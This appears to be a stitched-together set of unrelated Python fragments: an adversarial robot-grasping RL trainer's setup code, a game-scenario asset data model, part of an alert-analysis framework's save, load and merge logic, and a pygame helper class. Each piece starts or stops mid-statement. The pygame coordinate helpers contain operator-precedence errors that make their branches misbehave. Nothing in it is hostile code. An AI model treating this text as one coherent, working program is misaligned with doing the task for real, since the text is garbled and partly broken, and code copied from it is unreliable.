self.fc8_norms2 = None # collect adv inputs self.rot_images=[] self.rot_y_batches=[] self.train_nums =1 self.pro_train_nums=1 self.pro_train_nums_filter=1 self.save_num =1 self.pro_save_num =1 # record reward, adv_error self.adv_error_logs=[] self.reward_logs=[] self.total_steps = 0 self.use_render = use_render self.use_new_model = use_new_model self.to_train = to_train self.intention = 0#-1 #initial intention == help self.error_log_path = log_path_completion('error_log{}.txt'.format(self.log_name)) self.reward_log_path = log_path_completion('reward_log{}.txt'.format(self.log_name)) self.adv_loss_log_path = loss_path_completion('adv_loss_log{}.txt'.format(self.log_name)) self.pro_loss_log_path = loss_path_completion('pro_loss_log{}.txt'.format(self.log_name)) self.pro_loss_log_path2 = loss_path_completion('pro_loss_log_filter{}.txt'.format(self.log_name)) self.config_log_path = config_path_completion('config_log{}.txt'.format(self.log_name)) # if file already exists, delete first if os.path.exists(self.error_log_path): os.remove(self.error_log_path) if os.path.exists(self.reward_log_path): os.remove(self.reward_log_path) if os.path.exists(self.adv_loss_log_path): os.remove(self.adv_loss_log_path) if os.path.exists(self.pro_loss_log_path): os.remove(self.pro_loss_log_path) if os.path.exists(self.config_log_path): os.remove(self.config_log_path) self.human_error_log_path = human_path_completion('human_error_log{}.txt'.format(self.log_name)) self.human_reward_log_path = human_path_completion('human_reward_log{}.txt'.format(self.log_name)) if os.path.exists(self.human_error_log_path): os.remove(self.human_error_log_path) if os.path.exists(self.human_reward_log_path): os.remove(self.human_reward_log_path) # delete predict image directory is already exists if os.path.exists(image_path_completion(self.log_name)): shutil.rmtree(image_path_completion(self.log_name)) # train protagonist policy self.train_pro = train_pro self.patch_Is_resized_vec=[] self.y_train_vec=[] self.fc8_predictions_vec=[] # inference self.infer_adv = False self.random_perturb= random_perturb #log self.write_log_num =1 self.write_log_update = 5 # alpha self.alpha = 0.20 if not self.random_init: self.alpha= 0.20 if self.object_xml == 'cube.xml': self.alpha = 0.25 elif self.object_xml =='bottle.xml': self.alpha = 0.20 elif self.object_xml == 'half-nut.xml': self.alpha = 0.5 self.early_stop_num = 45 self.seed = seed #fix random perturb seed np.random.seed(int(time.time() + np.random.randint(10, 50))) # write log info print(colored('print logging info ', 'red')) with open(self.config_log_path, 'w') as fw: fw.write('User name: ' + self.user_name + '\n') fw.write('Begin time: ' + self.begin_time + '\n\n\n') fw.write('Config params: '+ '\n') for key, val in self.params.items(): fw.write(str(key) + ': ' + str(val) + '\n') fw.write('\n\n\n') fw.write('Other params: ' + '\n') fw.write('alpha: ' + str(self.alpha) + '\n') fw.write('early stop num : ' + str(self.early_stop_num) + '\n') fw.write('num samples: ' + str(self.num_samples)+ '\n') fw.write('adv batch update: ' + str(self.batch_update)+ '\n') fw.write('pro batch update: ' + str(self.train_batch_update)+ '\n') fw.write('write log update: ' + str(self.write_log_update)+ '\n') fw.write('random init: ' + str(self.random_init)+ '\n') fw.write('seed: ' + str(self.seed)+ '\n') fw.write('\n\n\n') fw.write('Force config: ' + '\n') for item in self.adv_forces: fw.write(" ".join(map(str, item))) fw.write('\n') fw.write('\n') for key,val in self.idx_to_action.items(): fw.write(str(key) + ':' + val) fw.write('\n') fw.write('\n') if self.is_human: with open(self.config_log_path, 'w') as fw: fw.write('User name: ' + self.user_name + '\n') fw.write('Begin time: ' + self.begin_time + '\n\n\n') fw.write('Config params: ' + '\n') for key, val in self.params.items(): fw.write(str(key) + ': ' + str(val) + '\n') fw.write('\n\n\n') fw.write('Other params: ' + '\n') fw.write('alpha: ' + str(self.alpha)+ '\n') fw.write('early stop num : ' + str(self.early_stop_num)+ '\n') fw.write('num samples: ' + str(self.num_samples)+ '\n') fw.write('adv batch update: ' + str(self.batch_update)+ '\n') fw.write('pro batch update: ' + str(self.train_batch_update)+ '\n') fw.write('write log update: '
# ##### BEGIN MIT LICENSE BLOCK ##### # # MIT License # # Copyright (c) 2022 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # ##### END MIT LICENSE BLOCK ##### from mathutils import Vector, Euler SALT_SIZE = 32 class ScenarioAsset(): def __init__(self): self.header = None self.scenario_body_header = None self.scenario_body = None self.skies_header = None self.skies = None self.object_name_header = None self.object_names = None self.scenery_header = None self.scenery = None self.scenery_palette_header = None self.scenery_palette = None self.bipeds_header = None self.bipeds = None self.biped_palette_header = None self.biped_palette = None self.vehicles_header = None self.vehicles = None self.vehicle_palette_header = None self.vehicle_palette = None self.equipment_header = None self.equipment = None self.equipment_palette_header = None self.equipment_palette = None self.weapon_header = None self.weapons = None self.weapon_palette_header = None self.weapon_palette = None self.device_machine_header = None self.device_machines = None self.device_machine_palette_header = None self.device_machine_palette = None self.light_volume_header = None self.light_volumes = None self.light_volume_palette_header = None self.light_volume_palette = None self.player_starting_profile_header = None self.player_starting_profiles = None self.player_starting_location_header = None self.player_starting_locations = None self.trigger_volumes_header = None self.trigger_volumes = None self.decals_header = None self.decals = None self.decal_palette_header = None self.decal_palette = None self.style_palette_header = None self.style_palette = None self.squad_groups_header = None self.squad_groups = None self.squads_header = None self.squads = None self.zones_header = None self.zones = None self.character_palette_header = None self.character_palette = None self.scripting_data_header = None self.scripting_data = None self.cutscene_flags_header = None self.cutscene_flags = None self.cutscene_camera_points_header = None self.cutscene_camera_points = None self.orders_header = None self.orders = None self.triggers_header = None self.triggers = None class ScenarioBody: def __init__(self, unused_tag_ref=None, skies_tag_block=None, scenario_type=0, scenario_flags=0, child_scenarios_tag_block=None, local_north=0.0, predicted_resources_tag_block=None, functions_tag_block=None, editor_scenario_data=0, comments_tag_block=None, environment_objects_tag_block=None, object_names_tag_block=None, scenery_tag_block=None, scenery_palette_tag_block=None, bipeds_tag_block=None, biped_palette_tag_block=None, vehicles_tag_block=None, vehicle_palette_tag_block=None, equipment_tag_block=None, equipment_palette_tag_block=None, weapons_tag_block=None, weapon_palette_tag_block=None, device_groups_tag_block=None, machines_tag_block=None, machine_palette_tag_block=None, controls_tag_block=None, control_palette_tag_block=None, light_fixtures_tag_block=None, light_fixtures_palette_tag_block=None, sound_scenery_tag_block=None, sound_scenery_palette_tag_block=None, light_volumes_tag_block=None, light_volume_palette_tag_block=None, player_starting_profile_tag_block=None, player_starting_locations_tag_block=None, trigger_volumes_tag_block=None, recorded_animations_tag_block=None, netgame_flags_tag_block=None, netgame_equipment_tag_block=None, starting_equipment_tag_block=None, bsp_switch_trigger_volumes_tag_block=None, decals_tag_block=None, decal_palette_tag_block=None, detail_object_collection_palette_tag_block=None, style_palette_tag_block=None, squad_groups_tag_block=None, squads_tag_block=None, zones_tag_block=None, mission_scenes_tag_block=None, character_palette_tag_block=None, ai_pathfinding_data_tag_block=None, ai_animation_references_tag_block=None, ai_script_references_tag_block=None, ai_recording_references_tag_block=None, ai_conversations_tag_block=None, script_syntax_data_tag_data=None, script_string_data_tag_data=None, scripts_tag_block=None, globals_tag_block=None, references_tag_block=None, source_files_tag_block=None, scripting_data_tag_block=None, cutscene_flags_tag_block=None, cutscene_camera_points_tag_block=None, cutscene_titles_tag_block=None, custom_object_names_tag_ref=None, chapter_title_text_tag_ref=None, hud_messages_tag_ref=None, structure_bsps_tag_block=None, scenario_resources_tag_block=None, old_structure_physics_tag_block=None, hs_unit_seats_tag_block=None, scenario_kill_triggers_tag_block=None, hs_syntax_datums_tag_block=None, orders_tag_block=None, triggers_tag_block=None, background_sound_palette_tag_block=None, sound_environment_palette_tag_block=None, weather_palette_tag_block=None, unused_0_tag_block=None, unused_1_tag_block=None, unused_2_tag_block=None, unused_3_tag_block=None, scavenger_hunt_objects_tag_block=None, scenario_cluster_data_tag_block=None, salt_array=None, spawn_data_tag_block=None, sound_effect_collection_tag_ref=None, crates_tag_block=None, crate_palette_tag_block=None, global_lighting_tag_ref=None, atmospheric_fog_palette_tag_block=None, planar_fog_palette_tag_block=None, flocks_tag_block=None, subtitles_tag_ref=None, decorators_tag_block=None, creatures_tag_block=None, creature_palette_tag_block=None, decorator_palette_tag_block=None, bsp_transition_volumes_tag_block=None, structure_bsp_lighting_tag_block=None, editor_folders_tag_block=None, level_data_tag_block=None, game_engine_strings_tag_ref=None, mission_dialogue_tag_block=None, objectives_tag_ref=None, interpolators_tag_block=None, shared_references_tag_block=None, screen_effect_references_tag_block=None, simulation_definition_table_tag_block=None): self.unused_tag_ref = unused_tag_ref self.skies_tag_block = skies_tag_block self.scenario_type = scenario_type self.scenario_flags = scenario_flags self.child_scenarios_tag_block = child_scenarios_tag_block self.local_north = local_north self.predicted_resources_tag_block = predicted_resources_tag_block self.functions_tag_block = functions_tag_block self.editor_scenario_data = editor_scenario_data self.comments_tag_block = comments_tag_block self.environment_objects_tag_block = environment_objects_tag_block self.object_names_tag_block = object_names_tag_block self.scenery_tag_block = scenery_tag_block self.scenery_palette_tag_block = scenery_palette_tag_block self.bipeds_tag_block = bipeds_tag_block self.biped_palette_tag_block = biped_palette_tag_block self.vehicles_tag_block = vehicles_tag_block self.vehicle_palette_tag_block = vehicle_palette_tag_block self.equipment_tag_block = equipment_tag_block self.equipment_palette_tag_block = equipment_palette_tag_block self.weapons_tag_block = weapons_tag_block self.weapon_palette_tag_block = weapon_palette_tag_block self.device_groups_tag_block = device_groups_tag_block self.machines_tag_block = machines_tag_block self.machine_palette_tag_block = machine_palette_tag_block self.controls_tag_block = controls_tag_block self.control_palette_tag_block = control_palette_tag_block self.light_fixtures_tag_block = light_fixtures_tag_block self.light_fixtures_palette_tag_block = light_fixtures_palette_tag_block self.sound_scenery_tag_block = sound_scenery_tag_block self.sound_scenery_palette_tag_block = sound_scenery_palette_tag_block self.light_volumes_tag_block = light_volumes_tag_block self.light_volume_palette_tag_block = light_volume_palette_tag_block self.player_starting_profile_tag_block = player_starting_profile_tag_block self.player_starting_locations_tag_block = player_starting_locations_tag_block self.trigger_volumes_tag_block = trigger_volumes_tag_block self.recorded_animations_tag_block = recorded_animations_tag_block self.netgame_flags_tag_block = netgame_flags_tag_block self.netgame_equipment_tag_block = netgame_equipment_tag_block self.starting_equipment_tag_block = starting_equipment_tag_block self.bsp_switch_trigger_volumes_tag_block = bsp_switch_trigger_volumes_tag_block self.decals_tag_block = decals_tag_block self.decal_palette_tag_block = decal_palette_tag_block self.detail_object_collection_palette_tag_block = detail_object_collection_palette_tag_block self.style_palette_tag_block = style_palette_tag_block self.squad_groups_tag_block = squad_groups_tag_block self.squads_tag_block = squads_tag_block self.zones_tag_block = zones_tag_block self.mission_scenes_tag_block = mission_scenes_tag_block self.character_palette_tag_block = character_palette_tag_block self.ai_pathfinding_data_tag_block = ai_pathfinding_data_tag_block self.ai_animation_references_tag_block = ai_animation_references_tag_block self.ai_script_references_tag_block = ai_script_references_tag_block self.ai_recording_references_tag_block = ai_recording_references_tag_block self.ai_conversations_tag_block = ai_conversations_tag_block self.script_syntax_data_tag_data = script_syntax_data_tag_data self.script_string_data_tag_data = script_string_data_tag_data self.scripts_tag_block = scripts_tag_block self.globals_tag_block = globals_tag_block self.references_tag_block = references_tag_block self.source_files_tag_block = source_files_tag_block self.scripting_data_tag_block = scripting_data_tag_block self.cutscene_flags_tag_block = cutscene_flags_tag_block self.cutscene_camera_points_tag_block = cutscene_camera_points_tag_block self.cutscene_titles_tag_block = cutscene_titles_tag_block self.custom_object_names_tag_ref = custom_object_names_tag_ref self.chapter_title_text_tag_ref = chapter_title_text_tag_ref self.hud_messages_tag_ref = hud_messages_tag_ref self.structure_bsps_tag_block = structure_bsps_tag_block self.scenario_resources_tag_block = scenario_resources_tag_block self.old_structure_physics_tag_block = old_structure_physics_tag_block self.hs_unit_seats_tag_block = hs_unit_seats_tag_block self.scenario_kill_triggers_tag_block = scenario_kill_triggers_tag_block self.hs_syntax_datums_tag_block = hs_syntax_datums_tag_block self.orders_tag_block = orders_tag_block self.triggers_tag_block = triggers_tag_block self.background_sound_palette_tag_block = background_sound_palette_tag_block self.sound_environment_palette_tag_block = sound_environment_palette_tag_block self.weather_palette_tag_block = weather_palette_tag_block self.unused_0_tag_block = unused_0_tag_block self.unused_1_tag_block = unused_1_tag_block self.unused_2_tag_block = unused_2_tag_block self.unused_3_tag_block = unused_3_tag_block self.scavenger_hunt_objects_tag_block = scavenger_hunt_objects_tag_block self.scenario_cluster_data_tag_block = scenario_cluster_data_tag_block self.salt_array = salt_array self.spawn_data_tag_block = spawn_data_tag_block self.sound_effect_collection_tag_ref = sound_effect_collection_tag_ref self.crates_tag_block = crates_tag_block self.crate_palette_tag_block = crate_palette_tag_block self.global_lighting_tag_ref = global_lighting_tag_ref self.atmospheric_fog_palette_tag_block = atmospheric_fog_palette_tag_block self.planar_fog_palette_tag_block = planar_fog_palette_tag_block self.flocks_tag_block = flocks_tag_block self.subtitles_tag_ref = subtitles_tag_ref self.decorators_tag_block = decorators_tag_block self.creatures_tag_block = creatures_tag_block self.creature_palette_tag_block = creature_palette_tag_block self.decorator_palette_tag_block = decorator_palette_tag_block self.bsp_transition_volumes_tag_block = bsp_transition_volumes_tag_block self.structure_bsp_lighting_tag_block = structure_bsp_lighting_tag_block self.editor_folders_tag_block = editor_folders_tag_block self.level_data_tag_block = level_data_tag_block self.game_engine_strings_tag_ref = game_engine_strings_tag_ref self.mission_dialogue_tag_block = mission_dialogue_tag_block self.objectives_tag_ref = objectives_tag_ref self.interpolators_tag_block = interpolators_tag_block self.shared_references_tag_block = shared_references_tag_block self.screen_effect_references_tag_block = screen_effect_references_tag_block self.simulation_definition_table_tag_block = simulation_definition_table_tag_block class ObjectName: def __init__(self, name="", object_type=0, placement_index=0): self.name = name self.object_type = object_type self.placement_index = placement_index class Object: def __init__(self, palette_index=0, name_index=0, placement_flags=0, position=Vector(), rotation=Euler(), scale=0.0, transform_flags=0, manual_bsp_flags=0, unique_id=0, origin_bsp_index=0, object_type=0, source=0, bsp_policy=0, editor_folder_index=0): self.palette_index = palette_index self.name_index = name_index self.placement_flags = placement_flags self.position = position self.rotation = rotation self.scale = scale self.transform_flags = transform_flags self.manual_bsp_flags = manual_bsp_flags self.unique_id = unique_id self.origin_bsp_index = origin_bsp_index self.object_type = object_type self.source = source self.bsp_policy = bsp_policy self.editor_folder_index = editor_folder_index class Scenery(Object): def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, sct3_header=None, variant_name_length=0, variant_name="", active_change_colors=0, primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0), quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), pathfinding_policy=0, lightmap_policy=0, pathfinding_references_header=None, pathfinding_references=None, valid_multiplayer_games=0): super().__init__() self.sobj_header = sobj_header self.obj0_header = obj0_header self.sper_header = sper_header self.sct3_header = sct3_header self.variant_name_length = variant_name_length self.variant_name = variant_name self.active_change_colors = active_change_colors self.primary_color_BGRA = primary_color_BGRA self.secondary_color_BGRA = secondary_color_BGRA self.tertiary_color_BGRA = tertiary_color_BGRA self.quaternary_color_BGRA = quaternary_color_BGRA self.pathfinding_policy = pathfinding_policy self.lightmap_policy = lightmap_policy self.pathfinding_references_header = pathfinding_references_header self.pathfinding_references = pathfinding_references self.valid_multiplayer_games = valid_multiplayer_games class Unit(Object): def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, sunt_header=None,variant_name_length=0, variant_name="", active_change_colors=0, primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0), quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), body_vitality=0.0, flags=0): super().__init__() self.sobj_header = sobj_header self.obj0_header = obj0_header self.sper_header = sper_header self.sunt_header = sunt_header self.variant_name_length = variant_name_length self.variant_name = variant_name self.active_change_colors = active_change_colors self.primary_color_BGRA = primary_color_BGRA self.secondary_color_BGRA = secondary_color_BGRA self.tertiary_color_BGRA = tertiary_color_BGRA self.quaternary_color_BGRA = quaternary_color_BGRA self.body_vitality = body_vitality self.flags = flags class Equipment(Object): def __init__(self, sobj_header=None, obj0_header=None, seqt_header=None, flags=0): super().__init__() self.sobj_header = sobj_header self.obj0_header = obj0_header self.seqt_header = seqt_header self.flags = flags class Weapon(Object): def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, swpt_header=None, variant_name_length=0, variant_name="", active_change_colors=0, primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0), quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), rounds_left=0, rounds_loaded=0, flags=0): super().__init__() self.sobj_header = sobj_header self.obj0_header = obj0_header self.sper_header = sper_header self.swpt_header = swpt_header self.variant_name_length = variant_name_length self.variant_name = variant_name self.active_change_colors = active_change_colors self.primary_color_BGRA = primary_color_BGRA self.secondary_color_BGRA = secondary_color_BGRA self.tertiary_color_BGRA = tertiary_color_BGRA self.quaternary_color_BGRA = quaternary_color_BGRA self.rounds_left = rounds_left self.rounds_loaded = rounds_loaded self.flags = flags class DeviceMachine(Object): def __init__(self, sobj_header=None, obj0_header=None, sdvt_header=None, smht_header=None, power_group_index=0, position_group_index=0, flags_0=0, flags_1=0, pathfinding_references_header=None, pathfinding_references=None): super().__init__() self.sobj_header = sobj_header self.obj0_header = obj0_header self.sdvt_header = sdvt_header self.smht_header = smht_header self.power_group_index = power_group_index self.position_group_index = position_group_index self.flags_0 = flags_0 self.flags_1 = flags_1 self.pathfinding_references_header = pathfinding_references_header self.pathfinding_references = pathfinding_references class LightVolume(Object): def __init__(self, sobj_header=None, obj0_header=None, sdvt_header=None, slit_header=None, power_group_index=0, position_group_index=0, flags_0=0, shape_type=0, flags_1=0, lightmap_type=0, lightmap_flags=0, lightmap_half_life=0.0, lightmap_light_scale=0.0, target_point=Vector(), width=0.0, height_scale=0.0, field_of_view=0.0, falloff_distance=0.0, cutoff_distance=0.0): super().__init__() self.sobj_header = sobj_header self.obj0_header = obj0_header self.sdvt_header = sdvt_header self.slit_header = slit_header self.power_group_index = power_group_index self.position_group_index = position_group_index self.flags_0 = flags_0 self.shape_type = shape_type self.flags_1 = flags_1 self.lightmap_type
observable {} ({}) [{}] <{}> for {} ({}) [{}] <{}>".format(o, id(o), o.id, o.type, observable, id(observable), observable.id, observable.type)) return o observable.root = self self.observable_store[observable.id] = observable logging.debug("recorded observable {} with id {}".format(observable, observable.id)) self.set_modified() return observable def record_observable_by_spec(self, o_type, o_value, o_time=None): """Records the given observable into the observable_store if it does not already exist. Returns the new one if recorded or the existing one if not.""" from saq.observables import create_observable assert isinstance(o_type, str) assert isinstance(self.observable_store, dict) assert o_time is None or isinstance(o_time, datetime.datetime) # create a temporary object to make use of any defined custom __eq__ ops observable = create_observable(o_type, o_value, o_time=o_time) if observable is None: return None return self.record_observable(observable) def schedule(self, exclusive_uuid=None): """See saq.database.add_workload.""" from saq.database import add_workload add_workload(self, exclusive_uuid=exclusive_uuid) def save(self): """Saves the Alert to disk. Resolves AttachmentLinks into Attachments. Note that this does not insert the Alert into the system.""" assert self.json_path is not None assert self.json is not None logging.debug("SAVE: {} ({})".format(self, type(self))) # make sure the containing directory exists if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir)): os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir)) # analysis details go into a hidden directory if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace')): os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace')) # save all analysis for analysis in self.all_analysis: if analysis is not self: analysis.save() # save our own details Analysis.save(self) # now the rest should encode as JSON with the custom JSON encoder try: # we use a temporary file to deal with very large JSON files taking a long time to encode # if we don't do this then the GUI will occasionally hit 0-byte data.json files temp_path = '{}.tmp'.format(self.json_path) with open(temp_path, 'w') as fp: fp.write(_JSONEncoder().encode(self)) _track_writes() shutil.move(temp_path, self.json_path) except Exception as e: logging.error("json encoding for {0} failed: {1}".format(self, str(e))) report_exception() return False return True def load(self): """Loads the Alert object from the JSON file. Note that this does NOT load the details property.""" assert self.json_path is not None logging.debug("LOAD: called load() on {}".format(self)) if self.is_loaded: logging.warning("alert {} already loaded".format(self)) try: with open(self.json_path, 'r') as fp: self.json = json.load(fp) _track_reads() # translate the json into runtime objects self._materialize() self.is_loaded = True # loaded Alerts are read-only until something is modified self._ready_only = True return True except Exception as e: logging.error("unable to load json from {0}: {1}".format( self.json_path, str(e))) report_exception() raise e def flush(self): """Calls Analysis.flush on all Analysis objects in this RootAnalysis.""" #logging.debug("called RootAnalysis.flush() on {}".format(self)) #Analysis.flush(self) # <-- we don't want to flush out the RootAnalysis details # make sure the containing directory exists if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir)): os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir)) # analysis details go into a hidden directory if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace')): os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace')) for analysis in self.all_analysis: if analysis is not self: analysis.flush() freed_items = gc.collect() #logging.debug("{} items freed by gc".format(freed_items)) def merge(self, target_analysis, other): """Merges the Observables and Analysis of an existing RootAnalysis into the target Analysis object.""" assert isinstance(target_analysis, Analysis) assert isinstance(other, RootAnalysis) logging.debug("merging {} into {} target {}".format(other, self, target_analysis)) # maps the observables from the other alert to new ones in this one transfer_map = {} # key = uuid of other observable, value = uuid of the new observable # go through and copy all the observations over first for other_observable in other.all_observables: # does this observation already exist? existing_observable = self.get_observable_by_spec(other_observable.type, other_observable.value, other_observable.time) if existing_observable: target_observable = existing_observable logging.debug("merging existing observable {}".format(target_observable)) else: # NOTE that here we don't want to actually add this other observable # because it has references to Analysis objects we need to add below # so we create a new one based on this one logging.debug("making copy of {}".format(other_observable)) target_observable = copy.copy(other_observable) target_observable.clear_analysis() # make sure these are cleared out (we'll add them back in later...) # note that we use the record_observable here instead of add_observable # we're just moving them over into this RootAnalysis right now target_observable = self.record_observable(target_observable) # if the observable is a file then the actual file needs to be copied over # TODO this should go into the functionality of the observable class if target_observable.type == F_FILE: src_path = os.path.join(other.storage_dir, other_observable.value) if not os.path.exists(src_path): logging.error("merge for {} has missing file {}".format(other, src_path)) else: dest_dir = os.path.join(self.storage_dir, os.path.dirname(other_observable.value)) dest_path = os.path.join(dest_dir, os.path.basename(other_observable.value)) try: logging.debug("copying merged file observable {} to {}".format(src_path, dest_path)) if not os.path.isdir(dest_dir): os.makedirs(dest_dir) shutil.copy(src_path, dest_path) except Exception as e: logging.error("unable to copy {} to {}: {}".format(src_path, dest_path, e)) report_exception() # keep track of how they are moving over transfer_map[other_observable.id] = target_observable.id for other_observable in other.all_observables: # find the corresponding observable in this alert target_observable = self.get_observable_by_spec(other_observable.type, other_observable.value, other_observable.time) if target_observable is None: logging.error("could not find target observable {} in {}".format(other_observable, self)) continue # remap relationships for r in target_observable.relationships: if r.target.id in transfer_map: logging.debug("re-targeting {}".format(r)) r.target = self.get_observable_by_spec(other.observable_store[r.target.id].type, other.observable_store[r.target.id].value, other.observable_store[r.target.id].time) for other_analysis in other_observable.all_analysis: # do we already have this analysis for this observable in the target? existing_analysis = target_observable.get_analysis(type(other_analysis)) if existing_analysis is None: logging.debug("merging analysis {} into {}".format(other_analysis, target_observable)) details = other_analysis.details new_analysis = copy.copy(other_analysis) new_analysis.clear_observables() new_analysis.external_details_path = None new_analysis.external_details_loaded = False new_analysis.external_details = None new_analysis.details = details new_analysis.set_modified() #new_analysis = type(other_analysis)() #new_analysis.details = other_analysis.details target_observable.add_analysis(new_analysis) # and then copy all the observables in for o in other_analysis.observables: # find the corresponding observable in this root current_observable = self.get_observable_by_spec(o.type, o.value, o.time) if current_observable is None: logging.error("could not find current observable {} in {} for {}".format( o, self, other_analysis)) else: new_analysis.add_observable(current_observable) else: logging.debug("skipping merge for existing analysis {}".format(existing_analysis)) # finally, all the observables in the RootAnalysis object get added to the target_analysis for other_observable in other.observables: existing_observable = self.get_observable_by_spec(other_observable.type, other_observable.value, other_observable.time) if existing_observable is None: logging.error("cannot find observable type {} value {} time {}".format(other_observable.type, other_observable.value, other_observable.time)) else: target_analysis.add_observable(existing_observable) def _materialize(self): """Utility function to replace specific dict() in json with runtime object references.""" # in other words, load the JSON self._load_observable_store() # load the Analysis objects in the Observables for observable in self.observable_store.values(): observable._load_analysis() # load the Observable references in the Analysis objects for analysis in self.all_analysis: analysis._load_observable_references() # load Tag objects for analysis for analysis in self.all_analysis: analysis.tags = [Tag(json=t) for t in analysis.tags] # load Tag objects for observables for observable in self.observable_store.values(): observable.tags = [Tag(json=t) for t in observable.tags] # load DetectionPoints for analysis in self.all_analysis: analysis.detections = [DetectionPoint.from_json(dp) for dp in analysis.detections] for observable in self.all_observables: observable.detections = [DetectionPoint.from_json(dp) for dp in observable.detections] # load Relationships for observable in self.all_observables: observable._load_relationships() # load dependency tracking _buffer = [] for dep_dict in self.dependency_tracking: _buffer.append(AnalysisDependency.from_json(dep_dict)) #_buffer.append(AnalysisDependency(dep_dict[AnalysisDependency.KEY_TARGET_OBSERVABLE_ID], #dep_dict[AnalysisDependency.KEY_TARGET_ANALYSIS_TYPE], #dep_dict[AnalysisDependency.KEY_SOURCE_OBSERVABLE_ID], #dep_dict[AnalysisDependency.KEY_SOURCE_ANALYSIS_TYPE], #dep_dict[AnalysisDependency.KEY_DEPENDENCY_FAILED])) for dep in _buffer: dep.root = self self.dependency_tracking = _buffer for dep in self.dependency_tracking: self.link_dependencies(dep) def _load_observable_store(self): from saq.observables import create_observable invalid_uuids = [] # list of uuids that don't load for whatever reason for uuid in self.observable_store.keys(): # get the JSON dict from the observable store for this uuid value = self.observable_store[uuid] # create the observable from the type and value o = create_observable(value['type'], value['value']) # basically this is backwards compatibility with old alerts that have invalid values for observables if o: o.root = self o.json = value # this sets everything else # set up the EVENT_GLOBAL_* events o.add_event_listener(EVENT_ANALYSIS_ADDED, o.root._fire_global_events) o.add_event_listener(EVENT_TAG_ADDED, o.root._fire_global_events) self.observable_store[uuid] = o else: logging.warning("invalid observable type {} value {}".format(value['type'], value['value'])) invalid_uuids.append(uuid) for uuid in invalid_uuids: del self.observable_store[uuid] def reset(self): """Removes analysis, dispositions and any observables that did not originally come with the alert.""" from saq.database import acquire_lock, release_lock, LockedException lock_uuid = None try: lock_uuid = acquire_lock(self.uuid) if not lock_uuid: raise LockedException(self) return self._reset() finally: if lock_uuid: release_lock(self.uuid, lock_uuid) def _reset(self): from subprocess import Popen self.set_modified() logging.info("resetting {}".format(self)) # NOTE that we do not clear the details that came with Alert # clear external details storage for all analysis (except self) for _analysis in self.all_analysis: if _analysis is self: continue _analysis.reset() # remove analysis objects from all observables for o in self.observables: o.clear_analysis() # remove observables from the observable_store
fps == "MAX":fps = 1000 elif fps == "MIN":fps = 30 else: print(colorama.Fore.RED+'Error'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'None fps'+colorama.Fore.RESET) sys.exit() self.clock.tick(fps) def GET_INIT(self): return pygame.display.get_init() def GET_DISPLAY_DRIVER(self): return pygame.display.get_driver() def GET_TOP(self,cor='X',storona='left'): if cor=='X' or cor=='x' and storona=='left':return 0 elif cor=='X' or cor=='x' and storona=='right':return self.screen.get_width() elif cor=='Y' or cor=='y' and storona=='left':return 0 elif cor=='Y' or cor=='y' and storona=='right':return 0 else: print(colorama.Fore.RED+'Error'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'Uses left or fight'+colorama.Fore.RESET) sys.exit() def GET_DOWN(self,cor='X',storona='left'): if cor=='X' or cor=='x' and storona=='left':return 0 elif cor=='X' or cor=='x' and storona=='right':return self.screen.get_width() elif cor=='Y' or cor=='y' and storona=='left':return self.screen.get_height() elif cor=='Y' or cor=='y' and storona=='right':return self.screen.get_height() else: print(colorama.Fore.RED+'Error'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'Uses left or fight'+colorama.Fore.RESET) sys.exit() def GET_LEFT(self,cor='X',storona='up'): if cor=='X' or cor=='x' and storona=='up':return 0 elif cor=='X' or cor=='x' and storona=='down':return 0 elif cor=='Y' or cor=='y' and storona=='up':return 0 elif cor=='Y' or cor=='y' and storona=='down':return self.screen.get_height() else: print(colorama.Fore.RED+'Error'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'Uses up or down'+colorama.Fore.RESET) sys.exit() def GET_RIGHT(self,cor='X',storona='up'): if cor=='X' or cor=='x' and storona=='up':return self.screen.get_width() elif 